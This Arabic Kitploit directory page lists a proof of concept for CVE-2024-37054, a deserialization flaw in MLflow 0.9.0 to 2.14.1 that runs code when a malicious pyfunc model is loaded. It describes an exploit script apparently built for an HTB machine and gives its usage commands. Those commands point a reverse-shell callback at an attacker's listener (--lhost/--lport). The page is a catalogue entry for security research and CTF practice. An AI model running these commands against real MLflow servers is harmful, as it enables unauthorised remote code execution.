Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-37054-PoC — PoC لـ CVE-2024-37054 | Kitploit
أدوات/GitHubGitHub/jimmexploit/cve-2024-37054-poc
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليم
GitHubjimmexploit/cve-2024-37054-poc

CVE-2024-37054-PoC

PoC لـ CVE-2024-37054

عرض المستودع
6منذ 3 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

الوصف

إثبات المفهوم لـ CVE-2024-37054، ثغرة أمنية خطيرة في إلغاء التسلسل في إصدارات MLflow من 0.9.0 إلى 2.14.1. عند تحميل نموذج pyfunc خبيث عبر mlflow.pyfunc.load_model()، يتم تنفيذ حمولة مختزنة تُنفذ كودًا عشوائيًا.

الملفات

  • exploit.py — استغلال كامل: تسجيل، تدريب، رفع، تشغيل (لآلة HTB SmartHire)
  • build_model.py — بناء نموذج خبيث محليًا (بناء فقط)

الاستخدام

بناء النموذج محليًا

root@kitploit:~
python3 build_model.py --lhost YOUR_IP --lport 4444

تشغيل الاستغلال الكامل

root@kitploit:~
# تسجيل حساب تلقائيًا واستغلال
python3 exploit.py --lhost YOUR_IP --lport 4444 --atoz

# استخدام جلسة موجودة
python3 exploit.py --lhost YOUR_IP --lport 4444 --session "eyJjb21w..."

إخلاء مسؤولية

لأغراض تعليمية واختبار الاختراق المصرح به فقط.

تنزيل الأداة